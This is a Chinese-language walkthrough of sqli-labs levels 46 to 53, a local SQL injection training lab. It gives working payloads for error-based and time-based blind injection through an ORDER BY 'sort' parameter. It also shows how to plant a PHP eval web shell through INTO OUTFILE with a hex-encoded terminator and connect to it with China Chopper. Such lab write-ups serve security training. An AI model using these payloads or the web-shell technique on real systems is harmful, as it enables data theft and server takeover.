sqli-labs Less46-Less53

Less-46

补充知识

select * from users order by 1 desc ;使用降序（倒序）排列

select * from users order by 1 asc ;使用升序（正序）排列

select right(database(),1);从右至左输出第一个字母

select lesft(database(),1);从左至右输出第一个字母

lines terminated by *** 每行输出以***结尾

打开第46关，发现一句话  Please input parameter as SORT with numeric value    

之前我们都是用id，这一关提示我们用SORT

 我们观察源码发现这一关要使用sort代替id

 我们输入?sort=1

 改变sort后面的数值，1代表把第一列按从小到大进行排列，3 就代表把第3列按从小到大进行排列：

http://127.0.0.1/sqli-labs-master/Less-46/?sort=3

 在开头说到了两句升序降序的代码，我们这里试着使用它的后缀

http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 desc  第一列降序排列

 http://127.0.0.1/sqli-labs-master/Less-46/?sort=3 asc   第三列升序排列

 接下来我们可以注入取数据了

方法一、报错注入

http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and updatexml(1,concat(0x7e,database()),1)

 http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),1),1)

 具体语句可以参考第17关的报错注入语句，此处省略

方法二、时间盲注

http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and if(length(database())=8,1,sleep(5))

 http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and if(left((select schema_name from information_schema.schemata limit 0,1),1)>'a',1,sleep(5)) --+

 剩下的语句可以参考第14关的语句

方法三、一句话木马

使用outfile的方法在WWW文件夹下创建文件夹less46  路径注意使用双斜杠

http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 into outfile "C:\phpStudy\WWW\less.php" --+

 发现文件虽然有了，但是没有一句话木马,无法与中国菜刀连接

 开头我们说到了lines terminated by 0x*  每行输出以0x*结尾   ，将最后添加的这句话转换成16进制

php的一句话是：

　　　　<?php @eval($_POST['pass']);?>

http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 into outfile "C:\phpStudy\WWW\less46.php" lines terminated by 0x3c3f70687020406576616c28245f504f53545b276c786b275d293b3f3e --+

 

 打开中国菜刀，右键添加

连接成功，可以访问

 

 Less-47

这一关使用单引号包裹，其他均与第46关相同

Less-48

这一关与第46关几乎一样，区别是这一关没有回显信息，所以不能使用报错注入，可以使用盲注或者一句话木马

Less-49

这一关使用单引号包裹，无回显信息，不能使用报错注入，可以使用盲注或者一句话木马，其他的参考第46关

Less-50

这一关我们首先查看有没有包裹

 查看源码，发现使用了mysqli_multi_query() 函数，我们这里可以使用报错注入，盲注，这里我们也可以使用堆叠注入创建新的表，堆叠注入写入一句话木马，这些都可以参考之前的关卡。

 Less-51

使用单引号包裹，其余和第50关相同

五种方法

1、报错注入

2、时间或布尔盲注

3、写入一句话木马

4、堆叠注入创建新的user表

5、堆叠注入写入一句话木马

Less-52

这一关没有包裹，没有回显，其余的与第50关基本相同，但我们不能使用报错注入

可以使用如下方法

1、盲注

2、一句话木马

3、堆叠注入创建新的user表

4、堆叠注入写入一句话木马

Less-53

这一关使用单引号进行包裹，无回显信息，不能使用报错注入，其余均和第50关相同

可以使用如下方法

1、盲注

2、一句话木马

3、堆叠注入创建新的user表

4、堆叠注入写入一句话木马